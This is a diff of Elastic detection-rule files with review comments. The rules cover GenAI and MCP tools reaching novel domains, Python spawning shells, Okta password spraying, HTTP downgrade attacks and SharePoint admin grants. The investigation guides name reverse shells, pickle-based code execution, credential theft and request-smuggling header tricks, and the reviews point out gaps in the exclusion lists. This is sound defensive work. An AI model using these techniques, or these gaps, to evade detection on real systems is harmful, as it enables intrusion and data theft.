GenAI tools may connect to new domains as vendors update their infrastructure, CDNs, or API endpoints.\n- Package managers (npm, pip) used by MCP servers may connect to package registries for dependency resolution.\n- Legitimate MCP servers and AI plugins connect to their respective backend services.\n- Developer workflows testing new AI integrations or MCP servers will naturally trigger alerts for novel domain connections.\n\n### Response and remediation\n\n- If the domain is confirmed malicious, block it at the network level and investigate the source of the compromise.\n- Review the GenAI tool's configuration for unauthorized MCP servers, plugins, or extensions that initiated the connection.\n- Investigate any data that may have been sent to the 
suspicious domain and assess the potential for data exfiltration.\n- Review and rotate any API keys, tokens, or credentials used by the GenAI tool.\n- Update detection rules to monitor the identified domain across all hosts in the environment.\n", + "query": "event.category:network and host.os.type:macos and event.action:connection_attempted and\n(\n process.name:(\n Claude or \"Claude Helper\" or \"Claude Helper (Plugin)\" or Copilot or Cursor or\n \"Cursor Helper\" or \"Cursor Helper (Plugin)\" or GPT4All or Jan or \"Jan Helper\" or\n KoboldCpp or \"LM Studio\" or Ollama or Windsurf or \"Windsurf Helper\" or\n \"Windsurf Helper (Plugin)\" or bunx or claude or codex or copilot or cursor or deno or\n gemini-cli or genaiscript or gpt4all or grok or jan or koboldcpp or llama-cli or\n llama-server or lmstudio or npx or ollama or pnpm or qwen or textgen or windsurf or yarn\n ) or\n (process.name:(node or node.exe) and process.command_line:(*openclaw* or *moltbot* or *clawdbot*))\n) and destination.domain:(* and not (\n aka.ms or anthropic.com or atlassian.com or cursor.com or cursor.sh or github.com or\n gpt4all.io or hf.co or huggingface.co or lmstudio.ai or localhost or ollama.ai or\n ollama.com or openai.com or *.aka.ms or *.akamaized.net or *.amazonaws.com or\n *.amplitude.com or *.anthropic.com or *.atlassian.com or *.aws.amazon.com or\n *.azure.com or *.cdn.cloudflare.net or *.cloudflare-dns.com or *.cloudflare.com or\n *.cloudflarestorage.com or *.codeium.com or *.cursor.com or *.cursor.sh or\n *.datadoghq.com or *.elastic-cloud.com or *.elastic.co or *.exp-tas.com or\n *.gemini.google.com or *.generativelanguage.googleapis.com or *.github.com or\n *.githubcopilot.com or *.githubusercontent.com or *.gitkraken.com or *.gitkraken.dev or\n *.google.com or *.googleapis.com or *.gpt4all.io or *.grok.x.ai or *.hf.co or\n *.honeycomb.io or *.huggingface.co or *.intercom.io or *.jan.ai or *.launchdarkly.com or\n *.lmstudio.ai or *.microsoft.com or *.mixpanel.com or 
*.msedge.net or *.npmjs.com or\n *.npmjs.org or *.ollama.ai or *.ollama.com or *.openai.com or *.pypi.org or\n *.r2.cloudflarestorage.com or *.segment.io or *.sentry.io or *.visualstudio.com or\n *.vsassets.io or *.vscode-cdn.net or *.windsurf.ai or *.x.ai or *.yarnpkg.com or\n *.cartocdn.com or *.chatgpt.com or *.claude.ai or *.claude.com or\n *.claudeusercontent.com or *.ggpht.com or *.gstatic.com or *.googleusercontent.com or\n *.launchpadcontent.net or *.pythonhosted.org or *.recaptcha.net or *.shields.io or\n *.snapcraftcontent.com or *.snapcraft.io or *.stripe.com or *.travis-ci.com or\n *.travis-ci.org or *.ubuntu.com or *.ytimg.com or\n *.github.io or *.githubassets.com or *.jsdelivr.net or *.nodesource.com or\n chatgpt.com or claude.ai or claude.com or flagcdn.com or gitlab.com or\n opencollective.com or pypi.org\n))\n", + "references": [ + "https://atlas.mitre.org/techniques/AML.T0086", + "https://glama.ai/blog/2025-11-11-the-lethal-trifecta-securing-model-context-protocol-against-data-flow-attacks", + "https://www.elastic.co/security-labs/elastic-advances-llm-security", + "https://specterops.io/blog/2025/11/21/an-evening-with-claude-code" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9050506c-df6d-4bdf-bc82-fcad0ef1e8c1", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation 
Guide", + "Domain: LLM", + "Mitre Atlas: T0086" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 4 + }, + "id": "9050506c-df6d-4bdf-bc82-fcad0ef1e8c1_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/92a36c98-b24a-4bf7-aac7-1eac71fa39cf_1.json b/packages/security_detection_engine/kibana/security_rule/92a36c98-b24a-4bf7-aac7-1eac71fa39cf_1.json new file mode 100644 index 00000000000..4016546b32c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/92a36c98-b24a-4bf7-aac7-1eac71fa39cf_1.json 
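Review bot: The `destination.domain` exclusion list in `query` contains several multi-tenant hosting and object-storage suffixes (`*.amazonaws.com`, `*.cloudflarestorage.com`, `*.r2.cloudflarestorage.com`, `*.githubusercontent.com`, `*.github.io`, `*.jsdelivr.net`), so a first-seen bucket or pages site under those parents never produces an alert even though the description targets exfiltration to attacker-controlled infrastructure. That coverage gap is not mentioned anywhere in `note`; the "False positive analysis" section should state that connections under these shared suffixes are allow-listed and that vendor-specific hostnames are preferable where the tools' known endpoints allow it. Separately, `process.name:(node or node.exe)` sits under `host.os.type:macos`, so the `node.exe` alternative can never match and the clause can be simplified to `(process.name:node and process.command_line:(*openclaw* or *moltbot* or *clawdbot*))`.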
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the first time a Python process spawns a shell on a given host. Malicious Python scripts, compromised dependencies, or model file deserialization can result in shell spawns that would not occur during normal workflows. Since legitimate Python processes rarely shell out to interactive shells, a first occurrence of this behavior on a host is a strong signal of potential compromise.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Python Spawned a Shell on Host", + "new_terms_fields": [ + "host.id", + "process.parent.executable" + ], + "note": "## Triage and analysis\n\n### Investigating First Time Python Spawned a Shell on Host\n\nAttackers who achieve Python code execution \u2014 whether through malicious scripts, compromised dependencies, or model file deserialization (e.g., pickle/PyTorch `__reduce__`) \u2014 often spawn shell processes to perform reconnaissance, credential theft, persistence, or reverse shell activity. Since legitimate Python workflows rarely shell out with `-c`, a first occurrence is highly suspicious.\n\nThis rule uses the New Terms rule type to detect the first occurrence of a Python process spawning a shell with the `-c` flag on a given host within a 7-day window. 
This approach reduces false positives from recurring legitimate Python workflows while surfacing novel, potentially malicious activity.\n\n### Possible investigation steps\n\n- Examine the parent Python process command line to identify the script or command that triggered the shell spawn.\n- Determine if the Python process was loading a model file (look for `torch.load`, `pickle.load`), running a standalone script, or executing via a compromised dependency.\n- Review the shell command arguments to assess intent (credential access, reverse shell, persistence, reconnaissance).\n- Inspect the full process tree to determine if the Python process was launched from an interactive session, a cron job, or an automated pipeline.\n- Investigate the origin of any recently downloaded scripts, packages, or model files on the host.\n- Correlate with other hosts in the environment to determine if the same behavior is occurring elsewhere, which may indicate a supply chain compromise.\n\n### False positive analysis\n\n- Development environments where Python scripts legitimately shell out for system tasks (e.g., build scripts, CI/CD runners) may trigger this rule on first occurrence. Consider excluding known CI/CD working directories or build automation paths.\n- Package installation via pip or conda may spawn shells during post-install scripts. 
These are excluded by the query filter.\n- Jupyter notebooks executing system commands via `!` or `subprocess` may trigger this rule in data science environments.\n\n### Response and remediation\n\n- Investigate the shell command that was executed and assess its impact (credential access, persistence, data exfiltration).\n- If a malicious file is confirmed, quarantine it and identify its source (PyPI, Hugging Face, shared drive, email attachment).\n- Scan other hosts that may have received the same file.\n- Review and rotate any credentials that may have been accessed.\n- Consider implementing `weights_only=True` enforcement for PyTorch model loading across the environment.\n", + "query": "event.category:process and host.os.type:macos and event.type:start and event.action:exec and\nprocess.parent.name:python* and\nprocess.name:(bash or dash or sh or tcsh or csh or zsh or ksh or fish) and process.args:\"-c\" and\nnot process.command_line:(*pip* or *conda* or *brew* or *jupyter*)\n", + "references": [ + "https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/", + "https://github.com/trailofbits/fickling", + "https://5stars217.github.io/2024-03-04-what-enables-malicious-models/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"92a36c98-b24a-4bf7-aac7-1eac71fa39cf", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Domain: LLM" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.006", + "name": "Python", + "reference": "https://attack.mitre.org/techniques/T1059/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "92a36c98-b24a-4bf7-aac7-1eac71fa39cf_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_207.json b/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_207.json deleted file mode 100644 index df058ebf77b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/94e734c0-2cda-11ef-84e1-f661ea17fbce_207.json +++ /dev/null 
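Review bot: The exclusion `not process.command_line:(*pip* or *conda* or *brew* or *jupyter*)` in `query` is evaluated against the spawned shell's own command line, not the Python parent's, so any `sh -c` invocation whose text merely contains one of those substrings (for example `pipeline`, or a path with `brew` in it) is suppressed regardless of what launched it. The "False positive analysis" section of `note` says pip and conda post-install shells "are excluded by the query filter", which reads as a parent-based exclusion; if that is the intent, the filter should move to the parent, e.g. `not process.parent.command_line:(*pip* or *conda* or *brew* or *jupyter*)`, with `process.parent.command_line` then added to `required_fields`. The `description` and `note` also say the rule fires on the first shell spawn "on a given host", but `new_terms_fields` is `host.id` plus `process.parent.executable`, so the baseline is per host and per Python interpreter path; wording such as "the first time a given Python executable spawns a shell on a host" would match the query.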
@@ -1,84 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts.", - "false_positives": [ - "Users may share an endpoint related to work or personal use in which separate Okta accounts are used.", - "Shared systems such as Kiosks and conference room computers may be used by multiple users." - ], - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Multiple Okta User Authentication Events with Client Address", - "note": "## Triage and analysis\n\n### Investigating Multiple Okta User Authentication Events with Client Address\n\nThis rule detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. 
Note that Okta does not log unrecognized usernames supplied during authentication attempts, so this rule may not detect all credential stuffing attempts or may indicate a targeted attack.\n\n#### Possible investigation steps:\nSince this is an ESQL rule, the `okta.actor.alternate_id` and `okta.client.ip` values can be used to pivot into the raw authentication events related to this activity.\n- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- Review the `okta.security_context.is_proxy` field to determine if the device is a proxy.\n - If the device is a proxy, this may indicate that a user is using a proxy to access multiple accounts for password spraying.\n- With the list of `okta.actor.alternate_id` values, review `event.outcome` results to determine if the authentication was successful.\n - If the authentication was successful for any user, pivoting to `event.action` values for those users may provide additional context.\n- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field.\n - Historical analysis should indicate if this device token hash is commonly associated with the user.\n- Review the `okta.event_type` field to determine the type of authentication event that occurred.\n - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons.\n - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying.\n - If the event type is `user.session.start`, the source may have attempted to establish a session via the Okta authentication API.\n- Examine the `okta.outcome.result` 
field to determine if the authentication was successful.\n- Review the past activities of the actor(s) involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n - This may help determine the authentication and authorization actions that occurred between the user, Okta and application.\n\n### False positive analysis:\n- A user may have legitimately started a session via a proxy for security or privacy reasons.\n- Users may share an endpoint related to work or personal use in which separate Okta accounts are used.\n - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons.\n - Shared systems such as Kiosks and conference room computers may be used by multiple users.\n - Shared working spaces may have a single endpoint that is used by multiple users.\n\n### Response and remediation:\n- Review the profile of the users involved in this action to determine if proxy usage may be expected.\n- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required.\n- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involves and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the users.\n- If any of the users are not legitimate, consider deactivating the user's account.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.\n - If so, confirm with the user this was a legitimate request.\n - If so and this was not a legitimate request, consider deactivating the user's account temporarily.\n - Reset passwords and reset MFA for the user.\n- If this is 
a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule.\n - This will prevent future occurrences of this event for this device from triggering the rule.\n - Alternatively adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule.\n - This should be done with caution as it may prevent legitimate alerts from being generated.\n", - "query": "from logs-okta*\n| where\n event.dataset == \"okta.system\" and\n (event.action == \"user.session.start\" or event.action like \"user.authentication.*\") and\n okta.outcome.reason == \"INVALID_CREDENTIALS\"\n| keep\n okta.client.ip,\n okta.actor.alternate_id,\n okta.actor.id,\n event.action,\n okta.outcome.reason\n| stats\n Esql.okta_actor_id_count_distinct = count_distinct(okta.actor.id)\n by\n okta.client.ip,\n okta.actor.alternate_id\n| where\n Esql.okta_actor_id_count_distinct > 5\n| sort\n Esql.okta_actor_id_count_distinct desc\n", - "references": [ - "https://support.okta.com/help/s/article/How-does-the-Device-Token-work?language=en_US", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", - "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", - "https://www.okta.com/resources/whitepaper-how-adaptive-mfa-can-help-in-mitigating-brute-force-attacks/", - "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", - "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" - ], - "related_integrations": [ - { - "package": "okta", - "version": "^3.0.0" - } - ], - "risk_score": 21, - "rule_id": "94e734c0-2cda-11ef-84e1-f661ea17fbce", - "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Use Case: 
Identity and Access Audit", - "Data Source: Okta", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - } - ] - }, - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.004", - "name": "Credential Stuffing", - "reference": "https://attack.mitre.org/techniques/T1110/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 207 - }, - "id": "94e734c0-2cda-11ef-84e1-f661ea17fbce_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9797d2c8-8ec9-48e6-a022-350cdfbf2d5e_2.json b/packages/security_detection_engine/kibana/security_rule/9797d2c8-8ec9-48e6-a022-350cdfbf2d5e_2.json new file mode 100644 index 00000000000..7aaa7d5f364 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9797d2c8-8ec9-48e6-a022-350cdfbf2d5e_2.json 
@@ -0,0 +1,74 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Through the new_terms rule type, this rule detects potential HTTP downgrade attacks by identifying HTTP traffic that uses a different HTTP version than the one typically used in the environment. An HTTP downgrade attack occurs when an attacker forces a connection via an older HTTP version, resulting in potentially less secure communication. For example, an attacker might downgrade a connection from HTTP/2 to HTTP/1.1 or HTTP/1.0 to exploit known vulnerabilities or weaknesses in the older protocol versions.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-nginx.access-*", + "logs-apache.access-*", + "logs-apache_tomcat.access-*", + "logs-traefik.access-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential HTTP Downgrade Attack", + "new_terms_fields": [ + "http.version", + "agent.id" + ], + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential HTTP Downgrade Attack\n\nThis detection surfaces HTTP traffic negotiating a protocol version that deviates from your baseline, a sign of downgrade attempts that strip protections and enable evasion or exploit paths in older behaviors. 
An attacker deliberately breaks HTTP/2 negotiation so the server falls back to HTTP/1.1, then probes with crafted headers and chunked bodies to attempt request smuggling or cache bypass against web services.\n\n### Possible investigation steps\n\n- Correlate with TLS termination or load balancer logs to verify ALPN or Upgrade negotiation (server advertising h2) and whether the same client/IP previously used h2 with the same SNI/Host, distinguishing forced downgrade from capability mismatch.\n- Review the downgraded requests for exploitation indicators such as simultaneous Content-Length and Transfer-Encoding headers, duplicated or mixed-case headers, unusual methods (TRACE or PRI), or inconsistent chunked encoding suggesting smuggling attempts.\n- Examine surrounding response patterns for increased 400/421/426/431/505, backend 5xx, connection resets, or latency spikes that coincide with these requests and indicate error-driven fallback or probing.\n- Check for recent config changes or incidents on CDNs/WAFs/load balancers and web servers (e.g., http2 enablement, ALPN lists, h2/h2c settings) that could have disabled HTTP/2 and caused benign fallbacks.\n- Cluster events by source IP/User-Agent/ASN and targeted host to identify campaign activity across services and pivot the sources through threat intelligence or reputation feeds.\n\n### False positive analysis\n\n- Recent Nginx/Apache/Tomcat configuration changes that disable HTTP/2/h2c or alter TLS/ALPN on specific virtual hosts can legitimately force clients to fall back to HTTP/1.1, surfacing as a downgrade event in access logs.\n- Newly onboarded internal services or scripts that only support HTTP/1.0/1.1 and begin hitting an endpoint for the first time can introduce a first-seen older http.version relative to an HTTP/2 baseline without malicious intent.\n\n### Response and remediation\n\n- Immediately block or challenge source IPs/ASNs repeatedly forcing HTTP/1.1 to hosts that previously negotiated HTTP/2 via 
ALPN, and enable WAF rules to drop \u201cUpgrade: h2c\u201d attempts, requests with both Content-Length and Transfer-Encoding, or duplicated/mixed-case headers.\n- Remove downgrade paths by requiring TLS+ALPN \u201ch2\u201d on 443 (e.g., Nginx listen 443 ssl http2; Apache Protocols h2 http/1.1), disabling cleartext h2c and HTTP/1.0 on public endpoints, and ensuring intermediaries do not strip ALPN or rewrite headers.\n- Redeploy corrected configs and validate end-to-end HTTP/2 with curl --http2 and browser devtools, then confirm normal 2xx/3xx rates and elimination of 421/426/431/505 responses and backend 5xx spikes around previously downgraded traffic.\n- Escalate to Incident Response if downgraded requests show smuggling patterns (simultaneous Content-Length and Transfer-Encoding, mixed-case duplicates, TRACE/PRI methods), hit sensitive paths (/admin, /login, /actuator), or trigger cache anomalies like cross-user content.\n- Harden parsing and caching by normalizing headers at the edge, enforcing a single Content-Length, disabling TRACE, setting strict client_header_buffer_size and large_client_header_buffers, and configuring proxies/backends to reject conflicting CL/TE or ambiguous chunked bodies.\n", + "query": "http.version:*\n", + "required_fields": [ + { + "ecs": true, + "name": "http.version", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9797d2c8-8ec9-48e6-a022-350cdfbf2d5e", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: Traefik", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + 
"subtechnique": [ + { + "id": "T1562.010", + "name": "Downgrade Attack", + "reference": "https://attack.mitre.org/techniques/T1562/010/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 2 + }, + "id": "9797d2c8-8ec9-48e6-a022-350cdfbf2d5e_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/98ebd6a1-77db-4fe1-b4fd-1bd3c737b780_1.json b/packages/security_detection_engine/kibana/security_rule/98ebd6a1-77db-4fe1-b4fd-1bd3c737b780_1.json new file mode 100644 index 00000000000..6aadde28b45 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/98ebd6a1-77db-4fe1-b4fd-1bd3c737b780_1.json 
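Review bot: `"query": "http.version:*\n"` selects every access-log event, so with `new_terms_fields` of `http.version` and `agent.id` the rule alerts on any version value an agent has not reported in the 7-day `history_window_start`, which presumably includes a first-seen HTTP/2 after an upgrade and the first events from a newly enrolled agent, neither of which is the downgrade that `name` and `description` claim. Constraining the KQL to the older versions the guide discusses, for example `http.version:("1.0" or "1.1")` if these integrations store the bare version number (to be confirmed against the nginx, apache, tomcat and traefik field values), would keep the new-terms baseline but only surface fallbacks. The baseline is also per `agent.id` rather than per server or virtual host, so one agent shipping logs for several sites mixes their versions; the "False positive analysis" section should say so, since the description's "typically used in the environment" suggests a broader baseline than the query implements.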
@@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies when a new SharePoint Site Administrator is added in Microsoft 365. Site Administrators have full control over SharePoint Sites, including the ability to manage permissions, access all content, and modify site settings. Adversaries who compromise a privileged account may add themselves or a controlled account as a Site Administrator to maintain persistent, high-privilege access to sensitive SharePoint data. This technique was notably observed in the 0mega ransomware campaign, where attackers elevated privileges to exfiltrate data and deploy ransom notes across SharePoint sites.", + "false_positives": [ + "Legitimate IT administrators adding Site admins as part of routine SharePoint site management.", + "Automated provisioning tools or scripts that assign Site admin roles during site creation workflows.", + "Organizational restructuring where site ownership is being transferred to new administrators." + ], + "from": "now-9m", + "index": [ + "filebeat-*", + "logs-o365.audit-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "M365 SharePoint Site Administrator Added", + "note": "## Triage and Analysis\n\n### Investigating M365 SharePoint Site Administrator Added\n\nSite Administrators in SharePoint Online have full control over a Site, including the ability to manage permissions, access all content, and configure site-level settings. Adversaries who gain access to a privileged account may assign Site Administrator rights to maintain persistent access or facilitate data exfiltration. The `SiteCollectionAdminAdded` audit event is logged when this privilege is granted.\n\n#### Possible Investigation Steps\n\n- Review the `user.id` field to determine who performed the action. 
Assess whether this user normally manages SharePoint site permissions.\n- Examine the `o365.audit.ModifiedProperties.SiteAdmin.NewValue` field to identify the account that was granted Site Administrator privileges.\n- Check the `o365.audit.SiteUrl` or `url.original` to determine which Site was targeted. Assess the sensitivity of the data stored in this site.\n- Review the `o365.audit.TargetUserOrGroupName` and `o365.audit.TargetUserOrGroupType` fields for additional context on the target principal.\n- Pivot to sign-in logs for the acting account to look for anomalies such as logins from unfamiliar locations, devices, or IP ranges.\n- Investigate whether the newly added admin account has performed subsequent actions such as file downloads, permission changes, or sharing link creation.\n- Check for other recent `SiteCollectionAdminAdded` events to determine if multiple Sites were targeted in a short time frame, which may indicate bulk privilege escalation.\n\n### False Positive Analysis\n\n- Routine SharePoint administration tasks by IT teams may trigger this alert. 
Correlate with change management tickets or scheduled maintenance windows.\n- Automated provisioning tools that assign Site admin roles during site creation or migration workflows may generate expected alerts.\n- Organizational changes such as team transitions or restructuring may involve legitimate Site admin reassignments.\n\n### Response and Remediation\n\n- If the admin addition is unauthorized, immediately remove the Site Administrator role from the suspicious account.\n- Reset credentials for both the account that performed the action and the account that was added, especially if compromise is suspected.\n- Review recent activity on the affected Site for signs of data exfiltration, permission changes, or content modifications.\n- Enable or verify enforcement of MFA for all accounts with SharePoint administrative privileges.\n- Audit the list of Site Administrators across all Sites to identify any other unauthorized additions.\n- Consider implementing Privileged Access Management (PAM) or Privileged Identity Management (PIM) to require just-in-time elevation for SharePoint admin roles.\n", + "query": "event.dataset:o365.audit\n and event.provider:(SharePoint or OneDrive)\n and event.category:web\n and event.action:SiteCollectionAdminAdded\n and event.outcome:success\n", + "references": [ + "https://learn.microsoft.com/en-us/purview/audit-log-activities#site-permissions-activities", + "https://www.obsidiansecurity.com/blog/saas-ransomware-observed-sharepoint-microsoft-365/" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + 
"rule_id": "98ebd6a1-77db-4fe1-b4fd-1bd3c737b780", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: SaaS", + "Domain: Identity", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.003", + "name": "Additional Cloud Roles", + "reference": "https://attack.mitre.org/techniques/T1098/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, + "id": "98ebd6a1-77db-4fe1-b4fd-1bd3c737b780_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9aeca498-1e3d-4496-9e12-6ef40047eb23_1.json b/packages/security_detection_engine/kibana/security_rule/9aeca498-1e3d-4496-9e12-6ef40047eb23_1.json new file mode 100644 index 00000000000..28e328b47a0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9aeca498-1e3d-4496-9e12-6ef40047eb23_1.json 
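Review bot: The query matches `event.provider:(SharePoint or OneDrive)`, but the name, description and false_positives entries only talk about SharePoint Sites, so if OneDrive personal sites emit the same `SiteCollectionAdminAdded` action, secondary-administrator assignments done during user offboarding or data transfer will likely fire this rule without the analyst being told to expect it. Either narrow the query to `event.provider:SharePoint` or add a false_positives entry such as `"OneDrive personal sites where a secondary administrator is assigned during user offboarding or data transfer."`. The note would also help triage more if it said that a self-grant — the acting `user.id` being the same principal as the account named in the added-admin value — should be treated as higher priority, since that is the pattern the description attributes to the 0mega campaign.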
